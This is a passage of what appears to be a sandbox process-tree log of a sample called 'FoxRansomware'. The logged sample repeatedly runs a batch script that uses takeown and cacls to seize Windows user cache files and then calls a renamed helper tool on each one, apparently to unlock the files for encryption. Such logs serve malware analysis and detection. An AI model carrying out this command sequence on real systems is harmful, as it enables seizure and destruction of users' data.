    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000008.bin" /E /G Admin:F /C
    3⤵
    PID:8584
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000008.bin"
    3⤵
    PID:8684
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "00000008.bin" -nobanner
    3⤵
    PID:8784
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "00000008.bin" -nobanner
      4⤵
      PID:8616
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:8628
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000M.bin""
  2⤵
  PID:9016
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000M.bin" /E /G Admin:F /C
    3⤵
    PID:9000
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000M.bin"
    3⤵
    PID:6688
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "0000000M.bin" -nobanner
    3⤵
    PID:6568
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "0000000M.bin" -nobanner
      4⤵
      PID:8780
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:9044
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000010.bin""
  2⤵
  PID:8912
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:8928
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000010.bin" /E /G Admin:F /C
    3⤵
    PID:8916
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000010.bin"
    3⤵
    PID:7436
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "00000010.bin" -nobanner
    3⤵
    PID:8944
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "00000010.bin" -nobanner
      4⤵
      PID:7092
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:8292
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000054.bin""
  2⤵
  PID:1932
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000054.bin" /E /G Admin:F /C
    3⤵
    PID:3644
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000054.bin"
    3⤵
    PID:3304
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "00000054.bin" -nobanner
    3⤵
    PID:4228
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "00000054.bin" -nobanner
      4⤵
      PID:8288
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:8964
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000070.bin""
  2⤵
  PID:3004
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000070.bin" /E /G Admin:F /C
    3⤵
    PID:7808
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000070.bin"
    3⤵
    PID:3572
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "00000070.bin" -nobanner
    3⤵
    PID:4244
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "00000070.bin" -nobanner
      4⤵
      PID:4688
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:7800
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007A.bin""
  2⤵
  PID:4048
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007A.bin" /E /G Admin:F /C
    3⤵
    PID:1440
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007A.bin"
    3⤵
    - Modifies file permissions
    PID:6536
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "0000007A.bin" -nobanner
    3⤵
    PID:6572
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "0000007A.bin" -nobanner
      4⤵
      PID:6276
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6256
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007K.bin""
  2⤵
  PID:5232
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007K.bin" /E /G Admin:F /C
    3⤵
    PID:6196
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007K.bin"
    3⤵
    - Modifies file permissions
    PID:6236
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "0000007K.bin" -nobanner
    3⤵
    PID:8056
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "0000007K.bin" -nobanner
      4⤵
      PID:7356
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6908
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008J.bin""
  2⤵
  PID:6204
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008J.bin" /E /G Admin:F /C
    3⤵
    PID:7912
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008J.bin"
    3⤵
    - Modifies file permissions
    PID:8184
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "0000008J.bin" -nobanner
    3⤵
    PID:1908
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "0000008J.bin" -nobanner
      4⤵
      PID:8028
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5812
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008V.bin""
  2⤵
  PID:7712
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008V.bin" /E /G Admin:F /C
    3⤵
    PID:8188
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008V.bin"
    3⤵
    - Modifies file permissions
    PID:5752
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "0000008V.bin" -nobanner
    3⤵
    PID:2388
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "0000008V.bin" -nobanner
      4⤵
      PID:6720
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:8148
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000C.bin""
  2⤵
  PID:8020
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000C.bin" /E /G Admin:F /C
    3⤵
    PID:7736
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000C.bin"
    3⤵
    PID:8084
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "0000000C.bin" -nobanner
    3⤵
    PID:3868
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "0000000C.bin" -nobanner
      4⤵
      PID:5340
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:7620
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000O.bin""
  2⤵
  PID:7544
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000O.bin" /E /G Admin:F /C
    3⤵
    PID:5504
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000O.bin"
    3⤵
    PID:5720
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "0000000O.bin" -nobanner
    3⤵
    PID:7984
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "0000000O.bin" -nobanner
      4⤵
      PID:7720
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:7616
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000012.bin""
  2⤵
  PID:4908
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000012.bin" /E /G Admin:F /C
    3⤵
    PID:5488
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000012.bin"
    3⤵
    PID:7784
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "00000012.bin" -nobanner
    3⤵
    PID:7840
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "00000012.bin" -nobanner
      4⤵
      PID:8168
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:7908
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000056.bin""
  2⤵
  PID:5172
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000056.bin" /E /G Admin:F /C
    3⤵
    PID:7412
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000056.bin"
    3⤵
    PID:760
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "00000056.bin" -nobanner
    3⤵
    PID:5828
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "00000056.bin" -nobanner
      4⤵
      PID:7664
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6612
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000072.bin""
  2⤵
  PID:5436
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000072.bin" /E /G Admin:F /C
    3⤵
    PID:7532
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000072.bin"
    3⤵
    PID:4136
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "00000072.bin" -nobanner
    3⤵
    PID:8224
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "00000072.bin" -nobanner
      4⤵
      PID:5496
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6396
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007C.bin""
  2⤵
  PID:4288
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007C.bin" /E /G Admin:F /C
    3⤵
    PID:7016
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007C.bin"
    3⤵
    - Modifies file permissions
    PID:1144
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "0000007C.bin" -nobanner
    3⤵
    PID:7868
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "0000007C.bin" -nobanner
      4⤵
      PID:5580
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6332
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007M.bin""
  2⤵
  PID:1772
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007M.bin" /E /G Admin:F /C
    3⤵
    PID:7112
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007M.bin"
    3⤵
    PID:5320
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "0000007M.bin" -nobanner
    3⤵
    PID:7108
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "0000007M.bin" -nobanner
      4⤵
      PID:6696
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5888
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008L.bin""
  2⤵
  PID:7072
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008L.bin" /E /G Admin:F /C
    3⤵
    PID:7212
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008L.bin"
    3⤵
    - Modifies file permissions
    PID:6776
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "0000008L.bin" -nobanner
    3⤵
    PID:6188
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "0000008L.bin" -nobanner
      4⤵
      PID:7876
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5712
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000091.bin""
  2⤵
  PID:5900
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000091.bin" /E /G Admin:F /C
    3⤵
    PID:9092
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000091.bin"
    3⤵
    PID:8800
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "00000091.bin" -nobanner
    3⤵
    PID:5944
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "00000091.bin" -nobanner
      4⤵
      PID:5864
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6428
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009M.bin""
  2⤵
  PID:6448
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009M.bin" /E /G Admin:F /C
    3⤵
    PID:7340
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009M.bin"
    3⤵
    PID:9152
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "0000009M.bin" -nobanner
    3⤵
    PID:5808
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "0000009M.bin" -nobanner
      4⤵
      PID:8796
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:9124
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A7.bin""
  2⤵
  PID:6680
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A7.bin" /E /G Admin:F /C
    3⤵
    PID:8876
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A7.bin"
    3⤵
    PID:8848
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "000000A7.bin" -nobanner
    3⤵
    PID:8872
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "000000A7.bin" -nobanner
      4⤵
      PID:8832
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:9112
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat.LOG1""
  2⤵
  PID:3272
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat.LOG1" /E /G Admin:F /C
    3⤵
    PID:5180
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat.LOG1"
    3⤵
    PID:9072
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "settings.dat.LOG1" -nobanner
    3⤵
    PID:7032
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "settings.dat.LOG1" -nobanner
      4⤵
      PID:9200
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5836
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Data.bin""
  2⤵
  PID:5744
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Data.bin" /E /G Admin:F /C
    3⤵
    PID:448
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Data.bin"
    3⤵
    PID:4464
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "TileCache_100_0_Data.bin" -nobanner
    3⤵
    PID:5276
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "TileCache_100_0_Data.bin" -nobanner
      4⤵
      PID:9128
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:7492
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\Users\Admin\AppData\Local\Microsoft\GameDVR\KnownGameList.bin""
  2⤵
  PID:4116
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\GameDVR\KnownGameList.bin" /E /G Admin:F /C
    3⤵
    PID:7184
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\GameDVR\KnownGameList.bin"
    3⤵
    PID:8108
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "KnownGameList.bin" -nobanner
    3⤵
    PID:1156
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "KnownGameList.bin" -nobanner
      4⤵
      PID:6388
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:308
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000F.bin""
  2⤵
  PID:6372
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000F.bin" /E /G Admin:F /C
    3⤵
    PID:272
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000F.bin"
    3⤵
    PID:280
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "0000000F.bin" -nobanner
    3⤵
    PID:6524
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "0000000F.bin" -nobanner
      4⤵
      PID:9108
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:8444
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000Q.bin""
  2⤵
  PID:6068
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000Q.bin" /E /G Admin:F /C
    3⤵
    PID:6504
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000Q.bin"
    3⤵
    PID:6516
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "0000000Q.bin" -nobanner
    3⤵
    PID:8208
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "0000000Q.bin" -nobanner
      4⤵
      PID:8420
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:8396
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000014.bin""
  2⤵
  PID:3092
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000014.bin" /E /G Admin:F /C
    3⤵
    PID:8052
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000014.bin"
    3⤵
    - Modifies file permissions
    PID:6912
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "00000014.bin" -nobanner
    3⤵
